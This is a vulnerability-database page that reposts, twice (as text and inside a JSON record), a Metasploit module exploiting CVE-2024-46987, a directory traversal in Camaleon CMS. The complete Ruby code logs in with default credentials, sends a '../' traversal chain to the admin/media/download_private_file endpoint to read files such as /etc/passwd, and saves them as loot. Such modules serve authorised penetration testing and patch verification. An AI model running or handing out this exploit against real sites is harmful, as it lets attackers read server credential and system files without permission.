Camaleon CMS Directory Traversal CVE-2024-46987_MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-

7.7 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Description

Exploits CVE-2024-46987, an authenticated directory traversal vulnerability in Camaleon CMS versions use auxiliary/gather/camaleondownloadprivatefile msf auxiliarycamaleondownloadprivatefile show actions ...actions... msf...

Visit Original Source

Basic Information

ID MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-

Published Apr 17, 2026 at 19:01

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Camaleon CMS Directory Traversal CVE-2024-46987',
'Description' => %q{
Exploits CVE-2024-46987, an authenticated directory traversal
vulnerability in Camaleon CMS versions <= 2.8.0 and 2.9.0
},
'Author' => [
'Peter Stockli', # Vulnerability Disclosure
'Goultarde', # Python Script
'bootstrapbool', # Metasploit Module
],
'License' => MSF_LICENSE,
'Privileged' => true,
'Platform' => 'linux',
'References' => [
['CVE', '2024-46987'],
[
'URL', # Advisory
'https://securitylab.github.com/advisories/GHSL-2024-182_GHSL-2024-186_Camaleon_CMS/'
],
[
'URL', # Python Script
'https://github.com/Goultarde/CVE-2024-46987'
],
],
'DisclosureDate' => '2024-08-08',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options(
[
OptString.new('USERNAME', [true, 'Valid username', 'admin']),
OptString.new('PASSWORD', [true, 'Valid password', 'admin123']),
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
OptString.new('TARGETURI', [false, 'The Camaleon CMS base path']),
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ]),
OptBool.new('STORE_LOOT', [false, 'Store the target file as loot', true])
]
)
end

def build_traversal_path(filepath, depth)
if depth == 0
return filepath
end

# Remove C:\ prefix if present (path traversal doesn't work with drive letters)
normalized_path = filepath.gsub(/^[A-Z]:\\/, '').gsub(/^[A-Z]:/, '')

traversal = '../' * depth

if normalized_path[0] == '/'
return "#{traversal[0..-2]}#{normalized_path}"
end

"#{traversal}#{normalized_path}"
end

def get_token(login_uri)
res = send_request_cgi({ 'uri' => login_uri, 'keep_cookies' => true })

return nil unless res && res.code == 200

match = res.body.match(/name="authenticity_token" value="([^"]+)"/)

return match ? match[1] : nil
end

def authenticate(username, password)
login_uri = normalize_uri(target_uri.path, 'admin/login')

vprint_status("Retrieving token from #{login_uri}")

token = get_token(login_uri)

if token.nil? || cookie_jar.empty?
fail_with(Failure::UnexpectedReply, 'Failed to retrieve token')
end

vprint_status("Retrieved token #{token}")
vprint_status("Authenticating to #{login_uri}")

res = send_request_cgi({
'method' => 'POST',
'uri' => login_uri,
'keep_cookies' => true,
'vars_post' => {
'authenticity_token' => token,
'user[username]' => username,
'user[password]' => password
}
})

unless res && res.code == 302
fail_with(Failure::NoAccess, 'Authentication failed')
end

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin/dashboard')
)

if res.body.downcase.include?('logout')
vprint_status('Authentication succeeded')
return
end

fail_with(Failure::NoAccess, 'Authentication failed')
end

def get_version
vprint_status('Attempting to get build number')

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin/dashboard')
)

return nil unless res && res.code == 200

html = res.get_html_document

version_div = html.css('div.pull-right').find do |div|
div.at_css('b') && div.at_css('b').text.strip == 'Version'
end

if version_div
match = version_div.text.strip.match(/Version\s*(\S+)/)
return match[1] if match
end
end

def vuln_version?(version)
print_status("Detected build version is #{version}")

if version == '2.9.0' || Rex::Version.new(version) < Rex::Version.new('2.8.1')
print_status('Version is vulnerable')
return true
end

print_warning('Version is not vulnerable')
false
end

def get_file(filepath)
filepath = build_traversal_path(filepath, datastore['DEPTH'])

lfi_uri = normalize_uri(
target_uri.path,
'admin/media/download_private_file'
)

vprint_status("Attempting to retrieve file #{filepath} from #{lfi_uri}")

res = send_request_cgi({
'uri' => lfi_uri,
'vars_get' => {
'file' => filepath
},
'encode_params' => false
})

if res
if res.code == 404
return nil
end

if res.body.downcase.include?('invalid file')
return nil
end

vprint_good('Successfully retrieved file')
return res.body
end
end

def run
cookie_jar.clear

authenticate(datastore['USERNAME'], datastore['PASSWORD'])

res = get_file(datastore['FILEPATH'])

if res.nil? || res == false || !res.is_a?(String)
fail_with(Failure::PayloadFailed, 'Failed to obtain file')
end

if datastore['STORE_LOOT']
path = store_loot(
'camaleon.traversal',
'text/plain',
datastore['RHOST'],
res,
datastore['FILEPATH']
)
print_good("#{datastore['FILEPATH']} stored as '#{path}'")
end

print_line
print_line(res)
end

def check
cookie_jar.clear

authenticate(datastore['USERNAME'], datastore['PASSWORD'])

version = get_version

if version.nil?
return Exploit::CheckCode::Unknown('Failed to get build version')
elsif vuln_version?(version) != true
return Exploit::CheckCode::Safe
end

res = get_file(datastore['FILEPATH'])

if res.nil? || res == false || !res.is_a?(String)
print_error('Failed to obtain file')
return Exploit::CheckCode::Appears
end

Exploit::CheckCode::Vulnerable
end
end

{
    "lastseen": "2026-04-17T19:28:03",
    "description": "Exploits CVE-2024-46987, an authenticated directory traversal vulnerability in Camaleon CMS versions use auxiliary/gather/camaleondownloadprivatefile msf auxiliarycamaleondownloadprivatefile show actions ...actions... msf...",
    "published": "2026-04-17T19:01:35",
    "modified": "2026-04-17T19:01:35",
    "type": "metasploit",
    "title": "Camaleon CMS Directory Traversal CVE-2024-46987",
    "source": "",
    "references": "",
    "id": "MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2024-46987"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n  include Msf::Auxiliary::Report\n  include Msf::Exploit::Remote::HttpClient\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Camaleon CMS Directory Traversal CVE-2024-46987',\n        'Description' => %q{\n          Exploits CVE-2024-46987, an authenticated directory traversal\n          vulnerability in Camaleon CMS versions <= 2.8.0 and 2.9.0\n        },\n        'Author' => [\n          'Peter Stockli', # Vulnerability Disclosure\n          'Goultarde',     # Python Script\n          'bootstrapbool', # Metasploit Module\n        ],\n        'License' => MSF_LICENSE,\n        'Privileged' => true,\n        'Platform' => 'linux',\n        'References' => [\n          ['CVE', '2024-46987'],\n          [\n            'URL',  # Advisory\n            'https://securitylab.github.com/advisories/GHSL-2024-182_GHSL-2024-186_Camaleon_CMS/'\n          ],\n          [\n            'URL',  # Python Script\n            'https://github.com/Goultarde/CVE-2024-46987'\n          ],\n        ],\n        'DisclosureDate' => '2024-08-08',\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => [IOC_IN_LOGS]\n        }\n      )\n    )\n    register_options(\n      [\n        OptString.new('USERNAME', [true, 'Valid username', 'admin']),\n        OptString.new('PASSWORD', [true, 'Valid password', 'admin123']),\n        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),\n        OptString.new('TARGETURI', [false, 'The Camaleon CMS base path']),\n        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ]),\n        OptBool.new('STORE_LOOT', [false, 'Store the target file as loot', true])\n      ]\n    )\n  end\n\n  def build_traversal_path(filepath, depth)\n    if depth == 0\n      return filepath\n    end\n\n    # Remove C:\\ prefix if present (path traversal doesn't work with drive letters)\n    normalized_path = filepath.gsub(/^[A-Z]:\\\\/, '').gsub(/^[A-Z]:/, '')\n\n    traversal = '../' * depth\n\n    if normalized_path[0] == '/'\n      return \"#{traversal[0..-2]}#{normalized_path}\"\n    end\n\n    \"#{traversal}#{normalized_path}\"\n  end\n\n  def get_token(login_uri)\n    res = send_request_cgi({ 'uri' => login_uri, 'keep_cookies' => true })\n\n    return nil unless res && res.code == 200\n\n    match = res.body.match(/name=\"authenticity_token\" value=\"([^\"]+)\"/)\n\n    return match ? match[1] : nil\n  end\n\n  def authenticate(username, password)\n    login_uri = normalize_uri(target_uri.path, 'admin/login')\n\n    vprint_status(\"Retrieving token from #{login_uri}\")\n\n    token = get_token(login_uri)\n\n    if token.nil? || cookie_jar.empty?\n      fail_with(Failure::UnexpectedReply, 'Failed to retrieve token')\n    end\n\n    vprint_status(\"Retrieved token #{token}\")\n    vprint_status(\"Authenticating to #{login_uri}\")\n\n    res = send_request_cgi({\n      'method' => 'POST',\n      'uri' => login_uri,\n      'keep_cookies' => true,\n      'vars_post' => {\n        'authenticity_token' => token,\n        'user[username]' => username,\n        'user[password]' => password\n      }\n    })\n\n    unless res && res.code == 302\n      fail_with(Failure::NoAccess, 'Authentication failed')\n    end\n\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'admin/dashboard')\n    )\n\n    if res.body.downcase.include?('logout')\n      vprint_status('Authentication succeeded')\n      return\n    end\n\n    fail_with(Failure::NoAccess, 'Authentication failed')\n  end\n\n  def get_version\n    vprint_status('Attempting to get build number')\n\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'admin/dashboard')\n    )\n\n    return nil unless res && res.code == 200\n\n    html = res.get_html_document\n\n    version_div = html.css('div.pull-right').find do |div|\n      div.at_css('b') && div.at_css('b').text.strip == 'Version'\n    end\n\n    if version_div\n      match = version_div.text.strip.match(/Version\\s*(\\S+)/)\n      return match[1] if match\n    end\n  end\n\n  def vuln_version?(version)\n    print_status(\"Detected build version is #{version}\")\n\n    if version == '2.9.0' || Rex::Version.new(version) < Rex::Version.new('2.8.1')\n      print_status('Version is vulnerable')\n      return true\n    end\n\n    print_warning('Version is not vulnerable')\n    false\n  end\n\n  def get_file(filepath)\n    filepath = build_traversal_path(filepath, datastore['DEPTH'])\n\n    lfi_uri = normalize_uri(\n      target_uri.path,\n      'admin/media/download_private_file'\n    )\n\n    vprint_status(\"Attempting to retrieve file #{filepath} from #{lfi_uri}\")\n\n    res = send_request_cgi({\n      'uri' => lfi_uri,\n      'vars_get' => {\n        'file' => filepath\n      },\n      'encode_params' => false\n    })\n\n    if res\n      if res.code == 404\n        return nil\n      end\n\n      if res.body.downcase.include?('invalid file')\n        return nil\n      end\n\n      vprint_good('Successfully retrieved file')\n      return res.body\n    end\n  end\n\n  def run\n    cookie_jar.clear\n\n    authenticate(datastore['USERNAME'], datastore['PASSWORD'])\n\n    res = get_file(datastore['FILEPATH'])\n\n    if res.nil? || res == false || !res.is_a?(String)\n      fail_with(Failure::PayloadFailed, 'Failed to obtain file')\n    end\n\n    if datastore['STORE_LOOT']\n      path = store_loot(\n        'camaleon.traversal',\n        'text/plain',\n        datastore['RHOST'],\n        res,\n        datastore['FILEPATH']\n      )\n      print_good(\"#{datastore['FILEPATH']} stored as '#{path}'\")\n    end\n\n    print_line\n    print_line(res)\n  end\n\n  def check\n    cookie_jar.clear\n\n    authenticate(datastore['USERNAME'], datastore['PASSWORD'])\n\n    version = get_version\n\n    if version.nil?\n      return Exploit::CheckCode::Unknown('Failed to get build version')\n    elsif vuln_version?(version) != true\n      return Exploit::CheckCode::Safe\n    end\n\n    res = get_file(datastore['FILEPATH'])\n\n    if res.nil? || res == false || !res.is_a?(String)\n      print_error('Failed to obtain file')\n      return Exploit::CheckCode::Appears\n    end\n\n    Exploit::CheckCode::Vulnerable\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/camaleon_download_private_file.rb",
    "cvss": {
        "score": 7.7,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/auxiliary/gather/camaleon_download_private_file/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply